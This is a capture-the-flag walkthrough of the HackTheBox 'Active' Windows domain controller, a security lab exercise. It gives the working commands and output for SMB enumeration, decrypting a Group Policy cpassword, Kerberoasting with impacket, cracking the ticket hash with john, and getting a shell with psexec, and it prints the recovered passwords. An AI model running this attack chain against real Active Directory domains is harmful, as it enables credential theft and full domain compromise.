You are currently viewing Active HTB Walkthrough
HTB Active (Easy) – Walkthrough

Active HTB Walkthrough

Hello hacker ! we’re going to dive in this easy Windows machine named “Active” on hackthebox website and try to capture the flag.

I hope it will be easy for you to understand the steps below and if you want me to add some details in a part or something specific, please feel free to contact me Here !

And now let’s move on and start our first scan.

1. Nmap result :

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-15 08:45:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)

Great ! now we have some interesting ports : 139 and 445 for SMB, so let’s check enum4linux command result :

$ enum4linux MACHINE_IP

//MACHINE_IP/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A                                                                                           
//MACHINE_IP/C$     Mapping: DENIED Listing: N/A Writing: N/A
//MACHINE_IP/IPC$   Mapping: OK Listing: DENIED Writing: N/A
//MACHINE_IP/NETLOGON       Mapping: DENIED Listing: N/A Writing: N/A
//MACHINE_IP/Replication    Mapping: OK Listing: OK Writing: N/A
//MACHINE_IP/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//MACHINE_IP/Users  Mapping: DENIED Listing: N/A Writing: N/A

We can see here that “Replication” share is the only one with “Listing OK”, so we are going to start enumeration using smbclient with anonymous user.

As we can see we have an interesting file :

Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/groups.xml

We download the file groups.xml and check its content :

<groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><br><user clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><br><properties action="U" newname="" fullname="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changelogon="0" nochange="1" neverexpires="1" acctdisabled="0" username="active.htb\SVC_TGS"><br></properties></user><br></groups><br>

Before we check this content for any helpful data, we should mention that old versions of Windows used Groups.xml file to store the Group Policy Preferences (passwords and other sensitive information related to local groups).

So we have two interesting information that can help us in exploitation phase :

  1. name=”active.htb\SVC_TGS”
  2. cpassword=”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”

So now let’s try to crack the cpassword with gpp-decrypt command :

2. Exploitation and user flag

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Cracked ! now we have to try smbmap with our user SVC_TGS :

$ smbmap -H MACHINE_IP -u SVC_TGS -p GPPstillStandingStrong2k18  

ADMIN$                                 NO ACCESS       Remote Admin
C$                                     NO ACCESS       Default share
IPC$                                   NO ACCESS       Remote IPC
NETLOGON                               READ ONLY       Logon server share 
Replication                            READ ONLY
SYSVOL                                 READ ONLY       Logon server share 
Users                                  READ ONLY

Awesome ! The “READ ONLY” is present on Users”, so get user.txt from SVC_TGS/desktop using smbclient.

$ smbclient //MACHINE_IP/Users -U active.htb/svc_tgs

3. PrivEsc and Root flag

Useful link : https://www.browserling.com/tools/ntlm-hash   :  hash NTLM Generator nthash

the user is SVC_TGS wich means it can be related to “Ticket Granting Service”

“Kerberoasting” is a cyberattack that exploits the Kerberos authentication protocol. Threat actors steal Kerberos service tickets to uncover the plaintext passwords of network service accounts.

Let’s try it !

$ impacket-GetUserSPNs -dc-ip MAHINE_IP -request active.htb/SVC_TGS

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-05-15 04:44:30.583765             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$af75fc7fedc34d95bbf4c78e1fb830ef$698cdf512c33390b7bb071bde2228da11cebdb7dc2216c5a8e414dd1d3ba74e04741030fd1af40478ab9e9ced487eb611bdb185a9de45cb7f246a78ccc9dc4693aba6e6abf752ed9654bbb0a504bbb642251ceb455b55616b990b24a65c9fc8c727f72e8d05dd419c4c223061fe512e4a6e1572ee24460027553e7d2e85db1bba8353064b84d9c7357de9df3be4b46be8e4089d2004684fab59c36e28601a40140ea8d45ab67a22e1b39caf83595fe7ab44b727ca5592a38f76c01eb28e6366919ddc7702a57b5f69bc58a13d35b2f229d2bdbb7c8c71b3ab849bf421ce55033a77e063acb9a89574da44fbd1eb88904aad4b9ee55267104d143fed128f76091e13789ae415f290555c3cbfff9a74ae8a6adfea7cf081c9a1bbe21d26bd97102f31a10d9c16c6f3530b502e424526264f0cd9e2e70ed05232a290ae44305ecf16465082c33b8485eee364384704b62149c5498789af0b259d0bfadb3675429cd7bdb34b6d5d82a1d17dad0a9d259fe9bca17805e3e03dea46ae34c1afddb3d5996d896be7d32ccbd7c67f691e278cf3dc4fab554e69a052e116eab0d33fe756ac6d8a637989b4d879e45d5e94076fbde093abc678f58b1a04cb144d70affae28a4247d6a3f05c565e3853d658c938daa90b0c60e54dce9eff269d09015ee1d68594c3d6bc95084e3ffea6d94024c1e37819e43b6e3bdff12b39778ce2ea25b007e1c196c0719822a3c0b8197e89c9eff432fdef8bca9f2d7f2524b5a735ca35618921066a95d0d639080d63f442f991296a4e5f219ea4981f6839f6611eb2c0b35b2723df991dbd5f87856329a7ca6188d391f9a39aa5a6d3b0a55a4be743bd113c1aa9ebe4a8866e609b0d1f407a391785b4fd1e2ab852dcb9a173cde6c3f84dd550173523886f033a432fab83f672768c91ba4a3e7d0c22b2295babaf687f3951c11e2bc9f78169323e3a63b221f6512b2983ebc7cbc2b39cc26bb6e047237a905d743d34dfcc0d199350bd79240cadc5d6f2cefb503150a29e325830cbda3ac3dd5d62eb9fb04c6d6a73ce48383ad119499eab20ee0302a4170bd8e1a09d1a5820b1ad30537c6a33ef91e6381645e2d97fdf59569a1304cd1db5a2019c7143c5305d160df4697cffca4a72aad4fab960bfc08104e492aea992e08838ad051bc80c3330aa7f1dd050ff173025f64ec390f8c961e0e9f142eda0c9bcfa37a94eb022729759eb18dccf5638319af

It works ! now we are going to crack the hash using krtgbt format in john command, so copy the hash in a file named hash and execute john as below :

$ john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt 

Ticketmaster1968 (?)

We use this password with psexec to get the root flag :

$ impacket-psexec administrator@MACHINE_IP

Finally we managed to complete this easy windows machine, i hope everything was clear and i hope you enjoyed hacking, don’t forget to share this walkthrough with your friends!

if you have any suggestions or want me to add some details to this post, feel free to contact me Here.